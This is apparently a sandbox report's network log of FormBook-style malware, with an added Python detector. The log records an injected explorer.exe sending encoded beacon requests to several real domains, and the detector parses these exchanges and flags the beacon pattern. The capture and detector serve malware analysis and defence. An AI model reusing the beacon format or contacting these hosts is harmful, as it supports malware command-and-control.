                                                                                Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73
                                                                                Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;dis


                                                                                Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
                                                                                10         | 192.168.2.6 | 49767       | 34.102.136.180 | 80               | C:\Windows\explorer.exe
                                                                                Timestamp                           | kBytes transferred | Direction | Data
                                                                                Aug 3, 2021 16:18:23.096551895 CEST | 6892 | OUT | GET /6mam/?wbYpSP=U4etKMGlduRHKY34/y2VHJ3U/bl1CG9JeeGxs20P+eoGUQdkn77fFsSN2SlAgFKwyO8ri7IQTA==&PJEt=HRR0_XgHGBD8 HTTP/1.1
                                                                                Host: www.mypursuitpodcast.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Aug 3, 2021 16:18:23.209711075 CEST | 6892 | IN | HTTP/1.1 403 Forbidden
                                                                                Server: openresty
                                                                                Date: Tue, 03 Aug 2021 14:18:23 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 275
                                                                                ETag: "6104831f-113"
                                                                                Via: 1.1 google
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
                                                                                11         | 192.168.2.6 | 49768       | 51.83.52.226   | 80               | C:\Windows\explorer.exe
                                                                                Timestamp                           | kBytes transferred | Direction | Data
                                                                                Aug 3, 2021 16:18:28.383270979 CEST | 6893 | OUT | GET /6mam/?wbYpSP=G66iPt+zysOdT87cMSNY3jIG1auw/RAx4PjK5prA1jAGCtavWTKfmUTffyE+Nzacke4pg1lsTg==&PJEt=HRR0_XgHGBD8 HTTP/1.1
                                                                                Host: www.besport24.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Aug 3, 2021 16:18:28.408617020 CEST | 6894 | IN | HTTP/1.1 301 Moved Permanently
                                                                                Connection: close
                                                                                Content-Type: text/html
                                                                                Content-Length: 707
                                                                                Date: Tue, 03 Aug 2021 14:18:28 GMT
                                                                                Location: https://www.besport24.com/6mam/?wbYpSP=G66iPt+zysOdT87cMSNY3jIG1auw/RAx4PjK5prA1jAGCtavWTKfmUTffyE+Nzacke4pg1lsTg==&PJEt=HRR0_XgHGBD8
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

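The sessions above all share one request shape: explorer.exe (a system process, which the report attributes to code injection) sends a bare GET to /6mam/ with two query parameters, only Host and Connection headers, and a body of seven NUL bytes, cycling through unrelated domains that answer 403, 410, 301 or, for www.importexportasia.com, a 200 OK whose body is a generic kangle 404 page. The Python below is an added example, not code from the sandbox report or from the malware: it parses raw HTTP exchanges shaped like the ones captured here, flags that beacon pattern, de-chunks responses and decodes them as UTF-8 (the report's Data Ascii column shows chunk sizes inline and drops non-ASCII bytes), and tabulates which host answered with which status. The only captured bytes reused are the mobiessence.com chunked body from the Data Raw column; the other messages are constructed, and the thresholds in is_formbook_like() are an assumption drawn from this capture rather than a published FormBook signature.

```python
"""Parse the captured HTTP exchanges and flag the beacon shape they share.

Added example, not code from the sandbox report or from FormBook.  Only the
mobiessence.com chunked body is reused from the report's Data Raw column; the
other messages are constructed, and is_formbook_like() is an assumption drawn
from this capture, not a published signature.
"""
import re

B64ISH = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")  # first query value: base64-like blob
PATH_TAG = re.compile(r"/[A-Za-z0-9]{2,8}/")        # short path tag such as /6mam/

# The 410 body exactly as the report prints it under "Data Raw": a chunked
# HTTP/1.1 body (size line, data, CRLF per chunk) ending with the 0 chunk.
REPORT_HEX = (
    "37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a "
    "34 66 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 "
    "20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 6f 62 69 65 73 "
    "73 65 6e 63 65 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a "
    "39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 33 62 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 "
    "6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 6f 62 69 65 "
    "73 73 65 6e 63 65 2e 63 6f 6d 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a "
    "38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a"
)

# Constructed from the mobiessence.com exchanges above: the request as the injected
# explorer.exe sent it (a GET with seven NUL bytes of body) and the 410 it got back.
BEACON_REQUEST = (
    b"GET /6mam/?wbYpSP=KE8gpfUEuqRqMBWGFV5goIwNmc44LE6Oi+PTcRo4vEp3RirjZlcD1GLbPH2NA5fTW+Y3K/xiNw=="
    b"&PJEt=HRR0_XgHGBD8 HTTP/1.1\r\nHost: www.mobiessence.com\r\nConnection: close\r\n\r\n" + b"\x00" * 7
)
BEACON_RESPONSE = (
    b"HTTP/1.1 410 Gone\r\nServer: openresty\r\nContent-Type: text/html\r\n"
    b"Transfer-Encoding: chunked\r\nConnection: close\r\n\r\n" + bytes.fromhex(REPORT_HEX)
)
# Constructed: a chunked 200 OK carrying the first two UTF-8 title characters of the
# importexportasia.com response, which the report's Data Ascii column drops.
UTF8_RESPONSE = (
    b"HTTP/1.1 200 OK\r\nContent-Type: text/html;charset=utf-8\r\nTransfer-Encoding: chunked\r\n\r\n"
    b"15\r\n<title>\xe6\xbe\xb3\xe9\x97\xa8</title>\r\n0\r\n\r\n"
)


def parse_http_message(raw):
    """Split a raw HTTP/1.x message into (start line, lower-cased headers, wire body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def dechunk(body):
    """Decode a chunked transfer-encoded body into payload bytes."""
    out, pos = bytearray(), 0
    while True:
        end = body.find(b"\r\n", pos)
        if end < 0:
            raise ValueError("truncated chunk header")
        size = int(body[pos:end].split(b";")[0], 16)  # chunk extensions are ignored
        if size == 0:
            return bytes(out)  # last chunk; trailers are not needed here
        pos = end + 2
        out += body[pos:pos + size]
        pos += size + 2  # skip the CRLF that terminates the chunk data


def response_text(raw):
    """Return (status code, body decoded as UTF-8) for a captured response."""
    start_line, headers, body = parse_http_message(raw)
    if headers.get("transfer-encoding", "").lower() == "chunked":
        body = dechunk(body)
    return int(start_line.split()[1]), body.decode("utf-8", errors="replace")


def beacon_features(raw_request):
    """Pull out the fields that separate the beacon from ordinary browser traffic."""
    start_line, headers, body = parse_http_message(raw_request)
    method, target, _ = start_line.split(" ", 2)
    path, _, query = target.partition("?")
    params = [p.split("=", 1) for p in query.split("&") if p]
    first_value = params[0][1] if params and len(params[0]) == 2 else ""
    return {
        "method": method,
        "host": headers.get("host", ""),
        "path": path,
        "param_names": [p[0] for p in params],
        "first_value_b64": B64ISH.fullmatch(first_value) is not None,
        "body_all_nul": len(body) > 0 and body.count(b"\x00") == len(body),
        "extra_headers": sorted(set(headers) - {"host", "connection"}),
    }


def is_formbook_like(f):
    """Heuristic from the capture above (an assumption): a GET that still carries an
    all-NUL body, sends nothing beyond Host and Connection, and targets
    /<tag>/?<key>=<base64>&<key>=<id>."""
    return (f["method"] == "GET" and f["body_all_nul"] and not f["extra_headers"]
            and PATH_TAG.fullmatch(f["path"]) is not None
            and len(f["param_names"]) == 2 and f["first_value_b64"])


def summarize(exchanges):
    """Map each beaconed Host to its status code.  FormBook contacts every domain in
    its config, real C2 and decoys alike, so hosts that do not reject the request
    are the ones to pivot on."""
    return {beacon_features(q)["host"]: response_text(r)[0] for q, r in exchanges}
```

Feed it the request and response bytes of each session (reconstructed from the Data Raw column rather than the lossy Data Ascii one) and summarize() gives the per-host outcome table; the decoded 200 OK from www.importexportasia.com shows up as a Chinese-language gambling-site 404 page, not a live C2 reply.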

                                                                                Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
                                                                                12         | 192.168.2.6 | 49769       | 52.58.78.16    | 80               | C:\Windows\explorer.exe
                                                                                Timestamp                           | kBytes transferred | Direction | Data
                                                                                Aug 3, 2021 16:18:38.628000021 CEST | 6895 | OUT | GET /6mam/?wbYpSP=KE8gpfUEuqRqMBWGFV5goIwNmc44LE6Oi+PTcRo4vEp3RirjZlcD1GLbPH2NA5fTW+Y3K/xiNw==&PJEt=HRR0_XgHGBD8 HTTP/1.1
                                                                                Host: www.mobiessence.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Aug 3, 2021 16:18:38.645533085 CEST | 6896 | IN | HTTP/1.1 410 Gone
                                                                                Server: openresty
                                                                                Date: Tue, 03 Aug 2021 14:18:31 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 66 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 6f 62 69 65 73 73 65 6e 63 65 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 33 62 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 6f 62 69 65 73 73 65 6e 63 65 2e 63 6f 6d 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 7<html>9 <head>4f <meta http-equiv='refresh' content='5; url=http://www.mobiessence.com/' />a </head>9 <body>3b You are being redirected to http://www.mobiessence.coma </body>8</html>0


                                                                                Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
                                                                                13         | 192.168.2.6 | 49770       | 23.227.38.74   | 80               | C:\Windows\explorer.exe
                                                                                Timestamp                           | kBytes transferred | Direction | Data
                                                                                Aug 3, 2021 16:18:43.672755957 CEST | 6896 | OUT | GET /6mam/?wbYpSP=E0pe+Y2tlTeS/nkCAz5H/oSd7jolrcEyLM5+sA5RPKgWYHOxmsRP4IrVmGJTeseGmyQ7XT1Vgg==&PJEt=HRR0_XgHGBD8 HTTP/1.1
                                                                                Host: www.trendyheld.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Aug 3, 2021 16:18:43.720793009 CEST | 6898 | IN | HTTP/1.1 403 Forbidden
                                                                                Date: Tue, 03 Aug 2021 14:18:43 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                X-Sorting-Hat-PodId: -1
                                                                                X-Dc: gcp-europe-west1
                                                                                X-Request-ID: 8fc68041-0d89-4d7e-9e16-7e594a52de97
                                                                                X-Download-Options: noopen
                                                                                X-Content-Type-Options: nosniff
                                                                                X-Permitted-Cross-Domain-Policies: none
                                                                                X-XSS-Protection: 1; mode=block
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Server: cloudflare
                                                                                CF-RAY: 67902d46fc2c4414-FRA
                                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73
                                                                                Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;dis


                                                                                Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
                                                                                14         | 192.168.2.6 | 49771       | 34.102.136.180 | 80               | C:\Windows\explorer.exe
                                                                                Timestamp                           | kBytes transferred | Direction | Data
                                                                                Aug 3, 2021 16:18:48.757162094 CEST | 6903 | OUT | GET /6mam/?wbYpSP=oQhTdcG1kNI9/Lmcc2Ae/5c2EVHHJUmgpucHXQ4UdnJs0zjkXV1wGSuIEzpJIo84TCfrKzWPPA==&PJEt=HRR0_XgHGBD8 HTTP/1.1
                                                                                Host: www.beastninjas.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Aug 3, 2021 16:18:48.870419979 CEST | 6903 | IN | HTTP/1.1 403 Forbidden
                                                                                Server: openresty
                                                                                Date: Tue, 03 Aug 2021 14:18:48 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 275
                                                                                ETag: "6104831f-113"
                                                                                Via: 1.1 google
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
                                                                                15         | 192.168.2.6 | 49772       | 23.27.129.115  | 80               | C:\Windows\explorer.exe
                                                                                Timestamp                           | kBytes transferred | Direction | Data
                                                                                Aug 3, 2021 16:18:59.144073963 CEST | 6904 | OUT | GET /6mam/?wbYpSP=2ekFb54j3d1mky1ioMZXLX6Zs25on60VYd2MbHSx0a3rFw0M4/d2RTsPPkjiG9H4TZ6139bXkw==&PJEt=HRR0_XgHGBD8 HTTP/1.1
                                                                                Host: www.importexportasia.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Aug 3, 2021 16:18:59.358800888 CEST | 6905 | IN | HTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Tue, 03 Aug 2021 14:19:25 GMT
                                                                                Content-Type: text/html;charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
